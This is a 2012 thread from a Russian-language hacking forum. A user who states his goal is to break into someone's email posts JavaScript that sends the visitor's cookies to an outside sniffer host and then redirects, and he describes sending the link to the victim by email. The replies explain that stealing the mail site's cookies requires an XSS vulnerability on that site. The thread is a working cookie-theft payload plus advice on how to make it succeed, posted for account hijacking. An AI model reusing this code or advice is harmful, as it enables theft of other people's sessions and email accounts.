ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Вопрос по снифферу (https://forum.antichat.xyz/showthread.php?t=8057557)

Maks.A 08.06.2012 01:00
Привет.

Есть цель - взломать почту
Я решил воспользоваться сниффером, мои действия:

1. На свой хостинг я залил файл, index.html, содержащий текст из сниффера:

JavaScript highlight

Код:

img =
new
Image
(); img.
src
=
"http://httpz.ru/nevxrmcroyc.gif?"
+
document
.
cookie
;
// редирект через 3 сек.
var
URL
=
"Здесь я указал ссылку на картинку, залитую на хостинг изображений"
var
speed =
3000
;
function
reload
(
) {
document
.
location
=
URL
}
setTimeout
(
"reload()"
, speed);
2. Отправляю текст вместе с ссылкой на мой index.html в письме.

в итоге после открытия ссылки приходят куки, но, кажется, не те

Верно ведь, что сниффер ворует куки с той страницы, которая была открыта только что? Кажись, сниффер ворует их со страницы, где лежит index.html

Вот я и ломаю голову, как сделать так, чтобы своровать куки именно с почты, а не с моего хостинга.

mr.borocco 18.06.2012 01:00
Убейте меня) Люди))))
Чувак)) тебе нужна xss, на том сайте с которого хош куки вытащить) Но ее надо еще найти)

Nick Hander 18.06.2012 01:00
Maks.A
Код расположен на твоем сайте, и куки следовательно будут снифаться с твоего сайта. Чтобы украсть куки с почты, нужно чтобы код выполнился на сайте почты, а для этого нужна XSS уязвимость.


Время: 21:01